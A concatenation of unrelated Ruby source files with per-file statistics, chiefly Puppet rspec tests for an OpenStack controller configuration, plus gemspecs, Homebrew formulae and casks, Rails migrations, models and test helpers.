context 'with neutron_user_password and neutron_db_password set' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password'
)
end
it 'raises an error if no bridge_interface is set' do
expect { subject }.to raise_error(Puppet::Error, /bridge_interface must be set when configuring neutron/)
end
end
context 'with neutron_user_password, neutron_db_password, and bridge_interface set' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0'
)
end
end
context 'with neutron_user_password, neutron_db_password, bridge_interface, and ovs_local_ip set' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1'
)
end
it 'raises an error if no shared metadata key is set' do
expect { subject }.to raise_error(Puppet::Error, /metadata_shared_secret parameter must be set when using metadata agent/)
end
end
context 'with neutron_user_password, neutron_db_password, bridge_interface, ovs_local_ip, and shared_secret set' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:metadata_shared_secret => 'shared_md_secret'
)
end
it 'contains an openstack::neutron class' do
should contain_class('openstack::neutron').with(
:db_host => '127.0.0.1',
:rabbit_host => '127.0.0.1',
:rabbit_user => 'openstack',
:rabbit_password => 'rabbit_pw',
:rabbit_virtual_host => '/',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:bridge_uplinks => 'br-ex:eth0',
:bridge_mappings => 'default:br-ex',
:enable_ovs_agent => true,
:firewall_driver => 'neutron.agent.linux.iptables_firewall.OVSHybridIptablesFirewallDriver',
:db_name => 'neutron',
:db_user => 'neutron',
:db_password => 'neutron_db_password',
:enable_dhcp_agent => true,
:enable_l3_agent => true,
:enable_metadata_agent => true,
:auth_url => 'http://127.0.0.1:35357/v2.0',
:user_password => 'neutron_user_password',
:shared_secret => 'shared_md_secret',
:keystone_host => '127.0.0.1',
:enabled => true,
:enable_server => true,
:debug => false,
:verbose => false
)
end
end
context 'with neutron_user_password, neutron_db_password, bridge_interface, ovs_local_ip, metadata_shared_secret, and force_config_drive set' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:metadata_shared_secret => 'shared_md_secret',
:force_config_drive => true
)
end
it 'contains a nova::compute class with force_config_drive set' do
should contain_class('nova::compute').with(
:enabled => true,
:force_config_drive => true
)
end
end
context 'with neutron_user_password, neutron_db_password, bridge_interface, ovs_local_ip, bridge_mappings, bridge_uplinks, and shared_secret set' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:network_vlan_ranges => '1:1000',
:bridge_mappings => ['intranet:br-intra','extranet:br-extra'],
:bridge_uplinks => ['intranet:eth1','extranet:eth2'],
:tenant_network_type => 'vlan',
:metadata_shared_secret => 'shared_md_secret'
)
end
it 'contains an openstack::neutron class' do
should contain_class('openstack::neutron').with(
:db_host => '127.0.0.1',
:rabbit_host => '127.0.0.1',
:rabbit_user => 'openstack',
:rabbit_password => 'rabbit_pw',
:rabbit_virtual_host => '/',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:network_vlan_ranges => '1:1000',
:bridge_uplinks => ['intranet:eth1','extranet:eth2'],
:bridge_mappings => ['intranet:br-intra','extranet:br-extra'],
:tenant_network_type => 'vlan',
:enable_ovs_agent => true,
:firewall_driver => 'neutron.agent.linux.iptables_firewall.OVSHybridIptablesFirewallDriver',
:db_name => 'neutron',
:db_user => 'neutron',
:db_password => 'neutron_db_password',
:enable_dhcp_agent => true,
:enable_l3_agent => true,
:enable_metadata_agent => true,
:auth_url => 'http://127.0.0.1:35357/v2.0',
:user_password => 'neutron_user_password',
:shared_secret => 'shared_md_secret',
:keystone_host => '127.0.0.1',
:enabled => true,
:enable_server => true,
:debug => false,
:verbose => false
)
end
end
end
context 'cinder enabled (which is the default)' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:metadata_shared_secret => 'shared_md_secret'
)
end
it 'raises an error if no cinder_db_password is set' do
expect { subject }.to raise_error(Puppet::Error, /Must set cinder db password when setting up a cinder controller/)
end
context 'with cinder_db_password set' do
before do
params.merge!(:cinder_db_password => 'cinder_db_password')
end
it 'raises an error if no cinder_user_password is set' do
expect { subject }.to raise_error(Puppet::Error, /Must set cinder user password when setting up a cinder controller/)
end
end
context 'with cinder_db_password and cinder_user_password set' do
before do
params.merge!(
:cinder_db_password => 'cinder_db_password',
:cinder_user_password => 'cinder_user_password'
)
end
      it 'configures openstack::cinder::all' do
should contain_class('openstack::cinder::all').with(
:bind_host => '0.0.0.0',
:keystone_auth_host => '127.0.0.1',
:keystone_password => 'cinder_user_password',
:rabbit_userid => 'openstack',
:rabbit_host => '127.0.0.1',
:db_password => 'cinder_db_password',
:db_dbname => 'cinder',
:db_user => 'cinder',
:db_type => 'mysql',
:iscsi_ip_address => '127.0.0.1',
:setup_test_volume => false,
:manage_volumes => true,
:volume_group => 'cinder-volumes',
:debug => false,
:verbose => false
)
should contain_nova_config('DEFAULT/volume_api_class').with(:value => 'nova.volume.cinder.API')
end
end
end
context 'cinder enabled and Ceph RBD as the backend' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:metadata_shared_secret => 'shared_md_secret',
:cinder_db_password => 'cinder_db_password',
:cinder_user_password => 'cinder_user_password',
:cinder_volume_driver => 'rbd',
:cinder_rbd_secret_uuid => 'e80afa94-a64c-486c-9e34-d55e85f26406'
)
end
it 'should have cinder::volume::rbd' do
should contain_class('cinder::volume::rbd').with(
:rbd_pool => 'volumes',
:rbd_user => 'volumes',
:rbd_secret_uuid => 'e80afa94-a64c-486c-9e34-d55e85f26406'
)
end
end
context 'cinder and neutron enabled (which is the default)' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:metadata_shared_secret => 'shared_md_secret',
:cinder_db_password => 'cinder_db_password',
:cinder_user_password => 'cinder_user_password'
)
end
it 'should have openstack::db::mysql configured' do
should contain_class('openstack::db::mysql').with(
:charset => 'latin1',
:mysql_root_password => 'sql_pass',
:mysql_bind_address => '0.0.0.0',
:mysql_account_security => true,
:keystone_db_user => 'keystone',
:keystone_db_password => 'keystone_pass',
:keystone_db_dbname => 'keystone',
:glance_db_user => 'glance',
:glance_db_password => 'glance_pass',
:glance_db_dbname => 'glance',
:nova_db_user => 'nova',
:nova_db_password => 'nova_pass',
:nova_db_dbname => 'nova',
:cinder => true,
:cinder_db_user => 'cinder',
:cinder_db_password => 'cinder_db_password',
:cinder_db_dbname => 'cinder',
:neutron => true,
:neutron_db_user => 'neutron',
:neutron_db_password => 'neutron_db_password',
:neutron_db_dbname => 'neutron',
:allowed_hosts => '%',
:enabled => true
)
end
it 'should have openstack::keystone configured' do
should contain_class('openstack::keystone').with(
:debug => false,
:verbose => false,
:db_type => 'mysql',
:db_host => '127.0.0.1',
:db_password => 'keystone_pass',
:db_name => 'keystone',
:db_user => 'keystone',
:admin_token => 'keystone_admin_token',
:admin_tenant => 'admin',
:admin_email => 'some_user@some_fake_email_address.foo',
:admin_password => 'ChangeMe',
:public_address => '10.0.0.1',
:internal_address => '10.0.0.1',
:admin_address => '10.0.0.1',
:region => 'RegionOne',
:glance_user_password => 'glance_pass',
:nova_user_password => 'nova_pass',
:cinder => true,
:cinder_user_password => 'cinder_user_password',
:neutron => true,
:neutron_user_password => 'neutron_user_password',
:enabled => true,
:bind_host => '0.0.0.0'
)
end
it 'should have openstack::glance configured' do
should contain_class('openstack::glance').with(
:debug => false,
:verbose => false,
:db_type => 'mysql',
:db_host => '127.0.0.1',
:keystone_host => '127.0.0.1',
:db_user => 'glance',
:db_name => 'glance',
:db_password => 'glance_pass',
:user_password => 'glance_pass',
:backend => 'file',
:enabled => true
)
end
it 'should have nova::compute configured' do
should contain_class('nova::compute').with(
:enabled => true,
:vnc_enabled => true,
:vncserver_proxyclient_address => '10.0.0.1',
:vncproxy_host => '10.0.0.1'
)
end
it 'should have nova::compute::libvirt configured' do
should contain_class('nova::compute::libvirt').with(
:libvirt_type => 'kvm',
:vncserver_listen => '10.0.0.1',
:migration_support => false
)
end
it 'should have openstack::nova::controller configured' do
should contain_class('openstack::nova::controller').with(
:db_host => '127.0.0.1',
:network_manager => 'nova.network.manager.FlatDHCPManager',
:network_config => {},
:floating_range => false,
:fixed_range => '10.0.0.0/24',
:public_address => '10.0.0.1',
:admin_address => false,
:internal_address => '10.0.0.1',
:auto_assign_floating_ip => false,
:create_networks => true,
:num_networks => 1,
:multi_host => false,
:public_interface => 'eth0',
:private_interface => false,
:neutron => true,
:neutron_user_password => 'neutron_user_password',
:metadata_shared_secret => 'shared_md_secret',
:nova_admin_tenant_name => 'services',
:nova_admin_user => 'nova',
:nova_user_password => 'nova_pass',
:nova_db_password => 'nova_pass',
:nova_db_user => 'nova',
:nova_db_dbname => 'nova',
:enabled_apis => 'ec2,osapi_compute,metadata',
:rabbit_user => 'openstack',
:rabbit_password => 'rabbit_pw',
:rabbit_virtual_host => '/',
:glance_api_servers => '10.0.0.1:9292',
:vnc_enabled => true,
:vncproxy_host => '10.0.0.1',
:debug => false,
:verbose => false,
:enabled => true
)
end
it 'should configure horizon' do
should contain_class('openstack::horizon').with(
:secret_key => 'secret_key',
:cache_server_ip => '127.0.0.1',
:cache_server_port => 11211,
:horizon_app_links => ''
)
end
end
context 'without neutron' do
before do
params.merge!(
:cinder => false,
:neutron => false,
:private_interface => 'eth1')
end
context 'without fixed_range' do
before do
params.merge!(
:fixed_range => false
)
end
it 'raises an error if no fixed_range is given' do
expect { subject }.to raise_error(Puppet::Error, /Must specify the fixed range when using nova-network/)
end
end
context 'without private_interface' do
before do
params.merge!(:private_interface => false)
end
it 'raises an error if no private_interface is given' do
expect { subject }.to raise_error(Puppet::Error, /private interface must be set when nova networking is used/)
end
end
context 'with multi_host enabled' do
before do
params.merge!(
:multi_host => true
)
end
it 'sets send_arp_for_ha' do
should contain_nova_config('DEFAULT/send_arp_for_ha').with(:value => true)
end
end
context 'with multi_host disabled' do
before do
params.merge!(
:multi_host => false
)
end
it 'unsets multi_host and send_arp_for_ha' do
should contain_nova_config('DEFAULT/multi_host').with(:value => false)
should contain_nova_config('DEFAULT/send_arp_for_ha').with(:value => false)
end
end
it 'configures nova::network' do
should contain_class('nova::network').with(
:private_interface => 'eth1',
:public_interface => 'eth0',
:fixed_range => '10.0.0.0/24',
:floating_range => false,
:network_manager => 'nova.network.manager.FlatDHCPManager',
:config_overrides => {},
:create_networks => true,
:enabled => true,
:install_service => true
)
end
end
context 'glance enabled and rbd as the backend' do
before do
params.merge!(
:neutron_user_password => 'neutron_user_password',
:neutron_db_password => 'neutron_db_password',
:bridge_interface => 'eth0',
:ovs_enable_tunneling => true,
:ovs_local_ip => '10.0.1.1',
:metadata_shared_secret => 'shared_md_secret',
:cinder_db_password => 'cinder_db_password',
:cinder_user_password => 'cinder_user_password',
:glance_backend => 'rbd'
)
end
it 'should have glance::backend::rbd with default user/pool' do
should contain_class('glance::backend::rbd').with(
:rbd_store_user => 'images',
:rbd_store_pool => 'images'
)
end
end
end
| 37.796578 | 152 | 0.548212 |
ed81908628446c58d1267e983707f2fd1d6c3c91 | 61 | class NericaRiceInputsController < ApplicationController
end
| 20.333333 | 56 | 0.901639 |
b970618d245bcec6ef195bea9334e8fd126e4a3e | 335 | require 'spec_helper'
describe OptaSD::Soccer::TournamentSchedule do
before do
@tournament_id = "bnni2f2e6ii20b1wmzcsbpj2o"
end
it "get match_facts by resource" do
ranking = OptaSD::Soccer::TournamentSchedule.new.resource(@tournament_id)#.get
# sdapidocumentation Account not Authorised for this request
end
end
| 23.928571 | 82 | 0.767164 |
e2babbdd6096e1002f08513c6de1c10d364c0dd0 | 524 | # == Schema Information
#
# Table name: assets
#
# id :integer not null, primary key
# theme_id :integer
# content_type :string
# public_url :string
# size :integer
# key :string
# created_at :datetime not null
# updated_at :datetime not null
# file :string
#
# Indexes
#
# index_assets_on_key (key)
# index_assets_on_theme_id (theme_id)
#
class Asset < ActiveRecord::Base
mount_uploader :file, AssetUploader
belongs_to :theme
end
| 20.96 | 55 | 0.616412 |
acc915939faf599c5063a48f8e4375eb4d673a33 | 1,191 | # encoding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'activejob/workers_lock/version'
Gem::Specification.new do |s|
s.name = "activejob-workers-lock"
s.version = Activejob::WorkersLock::VERSION
s.authors = ["jpatters"]
s.email = ["[email protected]"]
s.summary = %q{Adapt resque-workers-lock to work with ActiveJob}
s.description = ''
s.homepage = 'http://github.com/jpatters/activejob-workers-lock'
s.license = "MIT"
s.files = %w( README.md Rakefile Gemfile LICENSE.txt )
s.files += Dir.glob("lib/**/*")
s.files += Dir.glob("test/**/*")
s.executables = s.files.grep(%r{^bin/}) { |f| File.basename(f) }
s.test_files = s.files.grep(%r{^(test|spec|features)/})
s.require_paths = ["lib"]
s.add_dependency 'activejob', '>= 4.2'
s.add_dependency 'activesupport', '>= 4.2'
s.add_dependency "resque-workers-lock", "~> 2.0"
s.add_development_dependency "bundler", "~> 1.7"
s.add_development_dependency "rake", "~> 10.0"
s.add_development_dependency "rails"
s.add_development_dependency "sqlite3"
end
| 36.090909 | 72 | 0.639798 |
626d2813a9de7780198288023e2b7baa8d75a661 | 559 | cask 'shortcat' do
version '0.7.10'
sha256 '02744ac4837cf50aee8a2441c660ea65cea21fd6740006dbd13e5ca27c70ec6b'
url "https://files.shortcatapp.com/v#{version}/Shortcat.zip"
appcast 'https://shortcatapp.com/updates/appcast.xml'
name 'Sproutcube Shortcat'
homepage 'https://shortcatapp.com/'
app 'Shortcat.app'
zap trash: [
'~/Library/Application Support/Shortcat',
'~/Library/Cookies/com.sproutcube.Shortcat.binarycookies',
'~/Library/Preferences/com.sproutcube.Shortcat.plist',
]
end
| 31.055556 | 75 | 0.685152 |
ed0a305e0ce63da95ac9b2c533db5d7e4495011b | 163 | json.extract! bar_code, :id, :asn, :part_code, :qty, :date, :lot_size, :target, :location, :created_at, :updated_at
json.url bar_code_url(bar_code, format: :json)
| 54.333333 | 115 | 0.730061 |
e9e0f07c3aa4c7a186db8493d394fb19bfe8d413 | 348 | Sequel.migration do
up do
alter_table(:govt_inspection_sheets) do
add_column :tripsheet_loaded_at, DateTime
add_column :tripsheet_offloaded, :boolean, default: false
end
end
down do
alter_table(:govt_inspection_sheets) do
drop_column :tripsheet_loaded_at
drop_column :tripsheet_offloaded
end
end
end | 23.2 | 63 | 0.738506 |
e2095135932b4e9e83099d57ba32ae4ebd8583e4 | 747 | require 'spec_helper'
describe 'security_tidy_all_files' do
let(:msg) { 'Purging all files, be warned!' }
context 'with fix disabled' do
context 'code having unspecific tidy' do
let(:code) { "
tidy { '/usr/local':
}
" }
it 'should detect a single problem' do
expect(problems).to have(1).problem
end
it 'should create a warning' do
expect(problems).to contain_warning(msg).on_line(2).in_column(20)
end
end
context 'code having specific tidy' do
let(:code) { "
tidy { '/tmp':
age => '1w',
matches => [ '[0-9]pub*.tmp', '*.temp', 'tmpfile?' ]
}
" }
it 'should not detect any problems' do
expect(problems).to have(0).problems
end
end
end
end
| 20.189189 | 73 | 0.598394 |
622cf21d7bfb19465d979397d5f29ec305ca41cd | 7,646 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ApiManagement::Mgmt::V2017_03_01
module Models
#
# Request Report data.
#
class RequestReportRecordContract
include MsRestAzure
# @return [String] API identifier path. /apis/{apiId}
attr_accessor :api_id
# @return [String] Operation identifier path.
# /apis/{apiId}/operations/{operationId}
attr_accessor :operation_id
# @return [String] Product identifier path. /products/{productId}
attr_accessor :product_id
# @return [String] User identifier path. /users/{userId}
attr_accessor :user_id
      # @return [String] The HTTP method associated with this request.
attr_accessor :method
# @return [String] The full URL associated with this request.
attr_accessor :url
# @return [String] The client IP address associated with this request.
attr_accessor :ip_address
# @return [String] The HTTP status code received by the gateway as a
# result of forwarding this request to the backend.
attr_accessor :backend_response_code
# @return [Integer] The HTTP status code returned by the gateway.
attr_accessor :response_code
# @return [Integer] The size of the response returned by the gateway.
attr_accessor :response_size
# @return [DateTime] The date and time when this request was received by
# the gateway in ISO 8601 format.
attr_accessor :timestamp
# @return [String] Specifies if response cache was involved in generating
# the response. If the value is none, the cache was not used. If the
# value is hit, cached response was returned. If the value is miss, the
# cache was used but lookup resulted in a miss and request was fulfilled
# by the backend.
attr_accessor :cache
# @return [Float] The total time it took to process this request.
attr_accessor :api_time
      # @return [Float] The time it took to forward this request to the backend
# and get the response back.
attr_accessor :service_time
# @return [String] Azure region where the gateway that processed this
# request is located.
attr_accessor :api_region
# @return [String] Subscription identifier path.
# /subscriptions/{subscriptionId}
attr_accessor :subscription_id
# @return [String] Request Identifier.
attr_accessor :request_id
      # @return [Integer] The size of this request.
attr_accessor :request_size
#
# Mapper for RequestReportRecordContract class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'RequestReportRecordContract',
type: {
name: 'Composite',
class_name: 'RequestReportRecordContract',
model_properties: {
api_id: {
client_side_validation: true,
required: false,
serialized_name: 'apiId',
type: {
name: 'String'
}
},
operation_id: {
client_side_validation: true,
required: false,
serialized_name: 'operationId',
type: {
name: 'String'
}
},
product_id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'productId',
type: {
name: 'String'
}
},
user_id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'userId',
type: {
name: 'String'
}
},
method: {
client_side_validation: true,
required: false,
serialized_name: 'method',
type: {
name: 'String'
}
},
url: {
client_side_validation: true,
required: false,
serialized_name: 'url',
type: {
name: 'String'
}
},
ip_address: {
client_side_validation: true,
required: false,
serialized_name: 'ipAddress',
type: {
name: 'String'
}
},
backend_response_code: {
client_side_validation: true,
required: false,
serialized_name: 'backendResponseCode',
type: {
name: 'String'
}
},
response_code: {
client_side_validation: true,
required: false,
serialized_name: 'responseCode',
type: {
name: 'Number'
}
},
response_size: {
client_side_validation: true,
required: false,
serialized_name: 'responseSize',
type: {
name: 'Number'
}
},
timestamp: {
client_side_validation: true,
required: false,
serialized_name: 'timestamp',
type: {
name: 'DateTime'
}
},
cache: {
client_side_validation: true,
required: false,
serialized_name: 'cache',
type: {
name: 'String'
}
},
api_time: {
client_side_validation: true,
required: false,
serialized_name: 'apiTime',
type: {
name: 'Double'
}
},
service_time: {
client_side_validation: true,
required: false,
serialized_name: 'serviceTime',
type: {
name: 'Double'
}
},
api_region: {
client_side_validation: true,
required: false,
serialized_name: 'apiRegion',
type: {
name: 'String'
}
},
subscription_id: {
client_side_validation: true,
required: false,
serialized_name: 'subscriptionId',
type: {
name: 'String'
}
},
request_id: {
client_side_validation: true,
required: false,
serialized_name: 'requestId',
type: {
name: 'String'
}
},
request_size: {
client_side_validation: true,
required: false,
serialized_name: 'requestSize',
type: {
name: 'Number'
}
}
}
}
}
end
end
end
end
| 31.081301 | 79 | 0.485352 |
f7ab9506bbf2bcd4016868629d83cb90e273fa02 | 559 | require 'spec_helper'
describe ActsAsTenant::Configuration do
describe 'no configuration given' do
before do
ActsAsTenant.configure
end
it 'provides defaults' do
expect(ActsAsTenant.configuration.require_tenant).not_to be_truthy
end
end
describe 'with config block' do
after do
ActsAsTenant.configure
end
it 'stores config' do
ActsAsTenant.configure do |config|
config.require_tenant = true
end
expect(ActsAsTenant.configuration.require_tenant).to eq(true)
end
end
end
| 19.275862 | 72 | 0.699463 |
b93c9a9fb5d89782205117eb06edbe0b3d8d340a | 252 | class CreateMeasurements < ActiveRecord::Migration[6.1]
def change
create_table :measurements do |t|
t.integer :value
t.timestamp :date
t.references :measure, null: false, foreign_key: true
t.timestamps
end
end
end
| 21 | 59 | 0.678571 |
bf1798175e661a4e8b98b74ae25c920d87bb83ae | 659 | module Shaf
module Tasks
class RoutesTask
extend Rake::DSL
desc 'List path helpers'
task :routes do
require 'shaf/utils'
require 'config/database'
extend Shaf::Utils
bootstrap
Shaf::ApiRoutes::Registry.controllers.each do |controller|
puts "\n#{controller}:"
Shaf::ApiRoutes::Registry.routes_for(controller) do |methods, template, symbol|
puts format(
' %-50<symbol>s%-30<methods>s%<template>s',
{symbol: symbol, methods: methods.join(' | '), template: template}
)
end
end
end
end
end
end
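# Sample output (hypothetical controllers/routes), given the format string above:
#   PostsController:
#     posts_uri                                         GET | HEAD                    /posts
#     post_uri                                          GET | PUT | DELETE            /posts/:id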
| 24.407407 | 89 | 0.561457 |
08d47ccd1d610adbe6ca74e73115cec44eae7b05 | 993 | ENV['RAILS_ENV'] ||= 'test'
require_relative '../config/environment'
require 'rails/test_help'
require 'minitest/reporters'
Minitest::Reporters.use!
class ActiveSupport::TestCase
# Run tests in parallel with specified workers
parallelize(workers: :number_of_processors)
# Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order.
fixtures :all
# Returns true if a test user is logged in.
def is_logged_in?
!session[:user_id].nil?
end
# Log in as a particular user.
def log_in_as(user)
session[:user_id] = user.id
end
# Add more helper methods to be used by all tests here...
include ApplicationHelper
end
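# Example (hypothetical fixture name) using the helpers above in a controller test:
#   user = users(:michael)
#   log_in_as(user)
#   assert is_logged_in?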
class ActionDispatch::IntegrationTest
# Log in as a particular user.
def log_in_as(user, password: 'password', remember_me: '1')
post login_path, params: {session: {email: user.email,
password: password,
remember_me: remember_me}}
end
end
| 27.583333 | 82 | 0.676737 |
87d616fdba200351f9c20d11fa908db75882af79 | 851 | Pod::Spec.new do |s|
s.name = "MaterialComponentsCatalog"
s.version = "35.3.0"
s.authors = "The Material Components authors."
s.summary = "A collection of stand-alone production-ready UI libraries focused on design details."
s.homepage = "https://github.com/material-components/material-components-ios"
s.license = 'Apache 2.0'
s.source = { :git => "https://github.com/material-components/material-components-ios.git", :tag => "v#{s.version}" }
s.platform = :ios, '8.0'
s.requires_arc = true
s.source_files = 'components/*/examples/*.{h,m,swift}', 'components/*/examples/supplemental/*.{h,m,swift}'
s.resources = ['components/*/examples/resources/*']
s.dependency 'MaterialComponents'
s.public_header_files = 'components/*/examples/*.h', 'components/*/examples/supplemental/*.h'
end
| 53.1875 | 124 | 0.670975 |
b9fae129a6214138ed7bac3386605953b993e289 | 862 | $:.push File.expand_path("../lib", __FILE__)
# Maintain your gem's version:
require "devise_activity/version"
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = "devise-activity"
s.version = DeviseActivity::VERSION
s.authors = ["M Shahzad Tariq"]
s.email = ["[email protected]"]
s.homepage = "http://github.com/mshahzadtariq/devise-activity"
  s.summary     = "Store Devise user sessions and page-visit history, with durations and timestamps, in Rails"
  s.description = "Stores Devise user sessions and per-page visit history, including visit duration and date/time, in Rails applications"
s.license = "MIT"
s.files = Dir["{app,lib}/**/*", "MIT-LICENSE", "Rakefile", "README.rdoc"]
s.test_files = Dir["test/**/*"]
s.add_dependency "rails", '>= 3'
#s.add_development_dependency "sqlite3"
end
| 35.916667 | 108 | 0.683295 |
f86ee8d7f83f5f94284c840114080ebb704af393 | 3,295 | class Tm < Formula
desc "TriggerMesh CLI to work with knative objects"
homepage "https://triggermesh.com"
url "https://github.com/triggermesh/tm/archive/v1.4.0.tar.gz"
sha256 "b1828e354d1e50de6529506b4403ddc44df7620ff75b4a8d8fa63e44816e8778"
license "Apache-2.0"
head "https://github.com/triggermesh/tm.git"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "62e9de27ed9454818993c327ee536dcb7aecebfc1e696766c230fec78d8f4260"
sha256 cellar: :any_skip_relocation, big_sur: "53f371fb6b81dca5a459655162104bc86e3543414149140f6ad6f710a5fc9274"
sha256 cellar: :any_skip_relocation, catalina: "d34ebf03ddac7996b5c6499c32fdbca55f77eace1312bcd99acf3cce212b8cee"
sha256 cellar: :any_skip_relocation, mojave: "4b06cbfac7163ae780067d15ce3ea9a29c881cd8e161ae080cb27414cd8103c6"
end
depends_on "go" => :build
def install
ldflags = %W[
-s -w
-X github.com/triggermesh/tm/cmd.version=v#{version}
]
system "go", "build", *std_go_args, "-ldflags", ldflags.join(" ")
end
test do
(testpath/"kubeconfig").write <<~EOS
apiVersion: v1
clusters:
- cluster:
certificate-authority-data: test
server: http://127.0.0.1:8080
name: test
contexts:
- context:
cluster: test
user: test
name: test
current-context: test
kind: Config
preferences: {}
users:
- name: test
user:
token: test
EOS
ENV["KUBECONFIG"] = testpath/"kubeconfig"
# version
version_output = shell_output("#{bin}/tm version")
assert_match "Triggermesh CLI, version v#{version}", version_output
# node
system "#{bin}/tm", "generate", "node", "foo-node"
assert_predicate testpath/"foo-node/serverless.yaml", :exist?
assert_predicate testpath/"foo-node/handler.js", :exist?
runtime = "https://raw.githubusercontent.com/triggermesh/knative-lambda-runtime/master/node10/runtime.yaml"
yaml = File.read("foo-node/serverless.yaml")
assert_match "runtime: #{runtime}", yaml
# python
system "#{bin}/tm", "generate", "python", "foo-python"
assert_predicate testpath/"foo-python/serverless.yaml", :exist?
assert_predicate testpath/"foo-python/handler.py", :exist?
runtime = "https://raw.githubusercontent.com/triggermesh/knative-lambda-runtime/master/python37/runtime.yaml"
yaml = File.read("foo-python/serverless.yaml")
assert_match "runtime: #{runtime}", yaml
# go
system "#{bin}/tm", "generate", "go", "foo-go"
assert_predicate testpath/"foo-go/serverless.yaml", :exist?
assert_predicate testpath/"foo-go/main.go", :exist?
runtime = "https://raw.githubusercontent.com/triggermesh/knative-lambda-runtime/master/go/runtime.yaml"
yaml = File.read("foo-go/serverless.yaml")
assert_match "runtime: #{runtime}", yaml
# ruby
system "#{bin}/tm", "generate", "ruby", "foo-ruby"
assert_predicate testpath/"foo-ruby/serverless.yaml", :exist?
assert_predicate testpath/"foo-ruby/handler.rb", :exist?
runtime = "https://raw.githubusercontent.com/triggermesh/knative-lambda-runtime/master/ruby25/runtime.yaml"
yaml = File.read("foo-ruby/serverless.yaml")
assert_match "runtime: #{runtime}", yaml
end
end
| 35.815217 | 122 | 0.691047 |
f83164171b7863bdb4c347f0d462e47c12148536 | 163 | require 'nokogiri'
require 'pry'
require 'open-uri'
require_relative "daily_deal/version"
require_relative "./daily_deal/cli"
require_relative "./daily_deal/deal"
| 23.285714 | 37 | 0.803681 |
79c38cdf8e5b4bed06a69270b21f6c8410b864ca | 102 | require 'spec_helper_acceptance'
# Ensure IPv6 router advertisements are not accepted - Section 3.3.1
| 34 | 68 | 0.813725 |
33e0f150fe14445f6a5e8e2a10764e1553f903da | 730 | #
# Transcript.rb
# briquette
#
# Created by Dominic Dagradi on 7/31/11.
# Copyright 2011 Bearded. All rights reserved.
#
class Transcript
attr_accessor :room
attr_accessor :date
attr_accessor :site
attr_accessor :controller
def initialize _room, _date, sender
@room = _room
@date = Time.parse _date
@controller = sender
end
def loadTranscript
# get transcript from campfire
url = "/room/#{@room.id}/transcript/#{@date.year}/#{@date.month}/#{@date.day}.json"
request = Request.get(url, delegate:self, callback:"transcriptLoaded:", site:@room.site, options:{})
end
def transcriptLoaded request
@controller.transcriptLoaded request.responseHash["messages"]
end
end
| 22.8125 | 104 | 0.69589 |
03ee69b2399f215615ef287172868e8e0fd334d4 | 469 | module ReverseMarkdown
module Converters
class Strong < Base
def convert(node)
content = treat_children(node)
if content.strip.empty? || already_strong?(node)
content
else
"**#{content}**"
end
end
def already_strong?(node)
node.ancestors('strong').size > 0 || node.ancestors('b').size > 0
end
end
register :strong, Strong.new
register :b, Strong.new
end
end
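# Example (hypothetical input) of what the Strong converter produces:
#   ReverseMarkdown.convert('<strong>bold</strong>') # => "**bold**"
#   ReverseMarkdown.convert('<b><strong>bold</strong></b>')
#   # => "**bold**" (nested tags are not double-wrapped, thanks to already_strong?)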
| 21.318182 | 73 | 0.573561 |
edf4122b4c09ccc833f1dd4d845b28d8f5245338 | 228 | class Tapaal < Cask
url 'http://www.tapaal.net/fileadmin/download/tapaal-2.4/tapaal-2.4.2-mac.dmg'
homepage 'http://www.tapaal.net'
version '2.4.2'
sha1 '5590ebea1dee27d43ef1268f98c1e8683e64658b'
link 'Tapaal.app'
end
| 28.5 | 80 | 0.736842 |
d5db1c900575c4372d685bd0cc634a78b2b62ff7 | 640 | cask 'devonthink' do
version '2.11.2'
sha256 'd1ba068f0830e85457eedcf53f8c6843182fc3446d5de27b6f3cff8c2204ebfd'
# amazonaws.com/DTWebsiteSupport was verified as official when first introduced to the cask
url "https://s3.amazonaws.com/DTWebsiteSupport/download/devonthink/#{version}/DEVONthink_Personal.app.zip"
appcast 'https://www.devontechnologies.com/fileadmin/templates/filemaker/sparkle.php?product=217255&format=xml'
name 'DEVONthink Personal'
homepage 'https://www.devontechnologies.com/products/devonthink/devonthink-personal.html'
auto_updates true
depends_on macos: '>= :mavericks'
app 'DEVONthink.app'
end
| 40 | 113 | 0.801563 |
